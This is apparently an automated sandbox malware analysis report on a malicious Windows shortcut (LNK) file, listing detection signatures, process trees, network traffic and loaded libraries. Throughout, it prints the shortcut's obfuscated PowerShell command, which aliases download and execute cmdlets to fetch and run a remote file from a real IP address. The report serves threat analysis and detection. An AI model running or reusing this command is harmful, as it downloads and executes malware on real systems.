Edit tour

Windows Analysis Report
EzE0GqgjU0.lnk

Overview

General Information

Sample name:EzE0GqgjU0.lnk
renamed because original name is a hash value
Original sample name:9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e.lnk
Analysis ID:1568476
MD5:162434f6a1f739dc14ac5c644019b34f
SHA1:0bd42f8aab9653eba62d40a5229f079f2fdbd741
SHA256:9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e
Tags:104-37-175-232Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
PowerShell case anomaly found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 5576 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2548 cmdline: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5576, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 2548, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5576, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 2548, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://95.169.201.100:18960/uploads/team-1/readme.txtAvira URL Cloud: Label: malware
Source: EzE0GqgjU0.lnkReversingLabs: Detection: 23%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: EzE0GqgjU0.lnkJoe Sandbox ML: detected

Networking

barindex
Source: global trafficTCP traffic: 95.169.201.100 ports 18960,0,1,6,8,9
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 18960
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 18960
Source: global trafficTCP traffic: 192.168.2.6:49709 -> 95.169.201.100:18960
Source: Joe Sandbox ViewIP Address: 95.169.201.100 95.169.201.100
Source: Joe Sandbox ViewASN Name: GOBULNETBG GOBULNETBG
Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
Source: EzE0GqgjU0.lnkString found in binary or memory: http://95.169.201.100:18960/uploads/team-1/readme.txt)

System Summary

barindex
Source: EzE0GqgjU0.lnkLNK file: /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: classification engineClassification label: mal100.troj.winLNK@4/4@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrrfhykx.5ya.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: EzE0GqgjU0.lnkReversingLabs: Detection: 23%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: EzE0GqgjU0.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)Jump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 18960
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 18960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
